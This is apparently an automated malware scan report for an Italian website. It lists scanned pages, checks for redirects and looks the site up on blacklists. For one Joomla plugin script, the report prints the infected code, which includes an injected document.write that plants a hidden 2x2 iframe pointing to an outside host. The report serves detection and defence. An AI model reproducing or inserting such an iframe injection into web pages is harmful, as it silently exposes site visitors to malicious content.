Scanned pages/files
| Request | Server response | Status |
http://anticaia.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 12:57:29 GMT Location: http://www.anticaia.it/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.anticaia.it/ | 200 OK Content-Length: 25070 Content-Type: text/html | clean |
http://www.anticaia.it/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://s11.histats.com/js9.js | 200 OK Content-Length: 7417 Content-Type: text/javascript | clean |
http://anticaia.it/index.php?option=com_content&view=article&id=2&Itemid=2 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 12:57:31 GMT Location: http://www.anticaia.it/index.php?option=com_content&view=article&id=2&Itemid=2 Server: Apache Content-Length: 298 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=2&itemid=2 | 200 OK Content-Length: 12282 Content-Type: text/html | clean |
http://www.anticaia.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://anticaia.it/index.php?option=com_content&view=article&id=19&Itemid=18 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 12:57:32 GMT Location: http://www.anticaia.it/index.php?option=com_content&view=article&id=19&Itemid=18 Server: Apache Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18 | 200 OK Content-Length: 15871 Content-Type: text/html | clean |
http://www.anticaia.it/plugins/content/plugin_vsig/vsig.js | 200 OK Content-Length: 5177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function vsig_dom(obj) {return document.getElementById(obj); } function switchimg(t_ident, t_ident_b) { var topimg = "topimg" + t_ident_b[2]; t_ident[6] = t_ident[6].replace(/'/g, "'"); t_ident[4] = t_ident[4].replace(/'/g, "'"); t_ident[6] = t_ident[6].replace(/&/g, "&"); var t_cap = (typeof (vsig_dom(topimg).parentNode.href) !== "undefined") ? (vsig_dom(topimg).parentNode.parentNode.getElementsByTagName("div")) : (vsig_dom(topimg).p } else if (window.attachEvent) { window.attachEvent('onload', sl); } else { if (window.onload) { var ld = window.onload; window.onload = function () {ld(); sl(); }; } else { window.onload = sl; } } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=278244></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://moreclosings.com/showthread.php?sid=278244 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://moreclosings.com/showthread.php?sid=278244> | ||
http://anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=0 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 25 Dec 2014 12:57:33 GMT Location: http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=0 Server: Apache Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=0 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=1 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=2 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=3 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=4 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=5 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=6 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
http://www.anticaia.it/index.php?option=com_content&view=article&id=19&itemid=18&vsig19_0=7 | 200 OK Content-Length: 15875 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: anticaia.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 12:57:29 GMT
Location: http://www.anticaia.it/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
GET / HTTP/1.1
Host: anticaia.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 25 Dec 2014 12:57:29 GMT
Location: http://www.anticaia.it/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: anticaia.it
Referer: http://www.google.com/search?q=anticaia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: anticaia.it
Referer: http://www.google.com/search?q=anticaia.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anticaia.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://anticaia.it/
Result: anticaia.it is not infected or malware details are not published yet.
Result: anticaia.it is not infected or malware details are not published yet.